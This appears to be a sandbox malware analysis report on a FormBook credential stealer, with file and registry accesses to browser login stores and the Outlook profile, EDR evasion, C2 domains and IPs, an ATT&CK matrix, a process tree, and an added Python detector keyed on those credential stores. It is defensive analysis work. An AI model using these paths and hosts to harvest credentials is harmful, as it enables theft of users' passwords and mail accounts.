Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\xcopy.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
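The file and registry accesses listed above are the detection-relevant part of this section: a copy of xcopy.exe from SysWOW64 (the process FormBook injected into) opening the Chromium Cookies, Login Data, Local State and Web Data stores and the Outlook profile key. A process that is neither a browser nor a mail client touching those objects is the signal to key on. The following is an added example written for this report, not Joe Sandbox output and not code from the sample; it runs that check over constructed file-open and registry-open records that mirror the entries above. The PIDs, the benign chrome.exe event, the report.docx path and the allowlist of expected images are assumptions (tune the allowlist per fleet). Note that Sysmon does not log file reads, so in production these records come from Windows object-access auditing (Security event 4663 with a SACL on the browser profile directories) or from an EDR.

```python
"""Flag non-browser / non-mail processes that open browser credential stores
or the Outlook profile key (added example; records below are constructed)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Chromium-family credential stores seen in the report:
#   <...>\User Data\<profile>\[Network\](Cookies|Login Data|Local State|Web Data)
BROWSER_STORE_RE = re.compile(
    r"\\User Data\\(?:[^\\]+\\)?(?:Network\\)?(?:Cookies|Login Data|Local State|Web Data)$",
    re.IGNORECASE,
)
# Outlook MAPI profile tree queried by mail-credential stealers.
OUTLOOK_PROFILE_RE = re.compile(
    r"\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\", re.IGNORECASE
)
# Image names expected to open those objects (assumption; tune per environment).
EXPECTED_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe"}


@dataclass(frozen=True)
class Event:
    pid: int
    image: str    # full path of the accessing process image
    kind: str     # "file" or "registry"
    target: str   # object that was opened


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: Event) -> str | None:
    """Return the sensitive-store category of an event, or None if uninteresting."""
    if ev.kind == "file" and BROWSER_STORE_RE.search(ev.target):
        return "browser_credential_store"
    if ev.kind == "registry" and OUTLOOK_PROFILE_RE.search(ev.target):
        return "outlook_profile"
    return None


def detect(events: list[Event]) -> dict[tuple[int, str], dict]:
    """One alert per (pid, image) that opened a sensitive store without being
    an expected image. Each alert carries the categories hit and the targets."""
    alerts: dict[tuple[int, str], dict] = {}
    for ev in events:
        category = classify(ev)
        if category is None or image_name(ev.image) in EXPECTED_IMAGES:
            continue
        alert = alerts.setdefault((ev.pid, ev.image), {"categories": set(), "targets": []})
        alert["categories"].add(category)
        alert["targets"].append(ev.target)
    return alerts


def severity(alert: dict) -> str:
    # Browser stores plus the mail profile from one process is the stealer pattern.
    return "high" if len(alert["categories"]) > 1 else "medium"


XCOPY = "C:\\Windows\\SysWOW64\\xcopy.exe"
CHROME = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"

# Constructed records mirroring the report's entries (PIDs are made up).
SAMPLE_EVENTS = [
    Event(4120, XCOPY, "file", "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"),
    Event(4120, XCOPY, "file", "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies"),
    Event(4120, XCOPY, "file", "C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data"),
    Event(4120, XCOPY, "file", "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"),
    Event(4120, XCOPY, "registry",
          "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\"),
    # Benign: the browser itself reading its own store, and xcopy copying an ordinary file.
    Event(3008, CHROME, "file", "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"),
    Event(4120, XCOPY, "file", "C:\\Users\\user\\Documents\\report.docx"),
]

if __name__ == "__main__":
    for (pid, image), alert in detect(SAMPLE_EVENTS).items():
        print(f"[{severity(alert)}] pid={pid} {image}: {sorted(alert['categories'])}")
        for target in alert["targets"]:
            print("    ", target)
```

On the constructed input only the xcopy.exe process is reported, at high severity, because it hit both a browser store and the Outlook profile key; the chrome.exe read of its own Login Data and the unrelated document copy are ignored. Keying on the image name alone is deliberately simple: FormBook's injected host here is a genuine signed Windows binary, so a signature or path allowlist would not help, and the anomaly is what the process reads.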

                Remote Access Functionality

Source: Yara match | File source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.unpack | type: UNPACKEDPE
Source: Yara match | File source: 00000014.00000002.4143260862.00000000057D0000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000013.00000002.1987208170.0000000000110000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4141273840.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000008.00000002.1867935515.0000000001810000.00000040.10000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4145888813.00000000067A0000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000008.00000002.1867200881.0000000000400000.00000040.00000400.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4141340650.0000000002D80000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1984565405.0000000002C60000.00000040.10000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4139835446.0000000000520000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4141036989.00000000038E0000.00000040.00000001.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000008.00000002.1869778786.00000000031D0000.00000040.10000000.00040000.00000000.sdmp | type: MEMORY
MITRE ATT&CK Matrix (the number in parentheses is the count of report signatures mapped to that technique; techniques without a count were not observed for this sample)

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Scheduled Task/Job (1) | Scheduled Task/Job (1) | Process Injection (312) | Masquerading (1) | OS Credential Dumping (1) | Security Software Discovery (221) | Remote Services | Email Collection (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | DLL Side-Loading (1) | Scheduled Task/Job (1) | Disable or Modify Tools (11) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Archive Collected Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Abuse Elevation Control Mechanism (1) | Virtualization/Sandbox Evasion (41) | Security Account Manager | Virtualization/Sandbox Evasion (41) | SMB/Windows Admin Shares | Data from Local System (1) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | DLL Side-Loading (1) | Process Injection (312) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (4) | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Abuse Elevation Control Mechanism (1) | Cached Domain Credentials | System Information Discovery (113) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Obfuscated Files or Information (4) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Software Packing (12) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Timestomp (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | DLL Side-Loading (1) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1618747 | Sample: PAYMENT SWIFT COPY.exe | Start date: 19/02/2025 | Architecture: WINDOWS | Score: 100

Top-level network: www.vaishnavi.xyz; www.sidang.xyz (Performs DNS queries to domains with low reputation); 18 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Sigma detected: Scheduled temp file as task from temp location; Multi AV Scanner detection for submitted file; 8 other signatures

Process tree recovered from the graph (node numbers in brackets; the bare number after a process is its badge count from the graph, see legend; "injected" marks a process that received injected code rather than one the parent started):

PAYMENT SWIFT COPY.exe [10] 7 (started)
    dropped: C:\Users\user\AppData\...\NCchtKNKiPqC.exe, PE32
    dropped: C:\Users\...\NCchtKNKiPqC.exe:Zone.Identifier, ASCII
    dropped: C:\Users\user\AppData\Local\...\tmpFA76.tmp, XML
    dropped: C:\Users\user\...\PAYMENT SWIFT COPY.exe.log, ASCII
    signature: Adds a directory exclusion to Windows Defender
    PAYMENT SWIFT COPY.exe [16] (started)
        signature: Maps a DLL or memory area into another process
        drfYhRLxnrcfFY.exe [29] (injected)
            signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
            xcopy.exe [42] (started)
                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                drfYhRLxnrcfFY.exe [47] (injected)
                    network: www.tkloqr.info 47.83.1.90, ports 50065, 50066, 50067 (VODANETInternationalIP-BackboneofVodafoneDE, United States)
                    network: 031235045.xyz 144.76.229.203, ports 50025, 50026, 50027 (HETZNER-ASDE, Germany)
                    network: 8 other IPs or domains
                    signature: Found direct / indirect Syscall (likely to bypass EDR)
                firefox.exe [51] (started)
            xcopy.exe [45] (started)
    powershell.exe [19] 23 (started)
        signature: Loading BitLocker PowerShell Module
        WmiPrvSE.exe [32] (started)
        conhost.exe [34] (started)
    powershell.exe [21] 23 (started)
        conhost.exe [36] (started)
    schtasks.exe [23] 1 (started)
        conhost.exe [38] (started)
NCchtKNKiPqC.exe [14] 5 (started)
    signature: Multi AV Scanner detection for dropped file
    NCchtKNKiPqC.exe [25] (started)
    schtasks.exe [27] 1 (started)
        conhost.exe [40] (started)

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.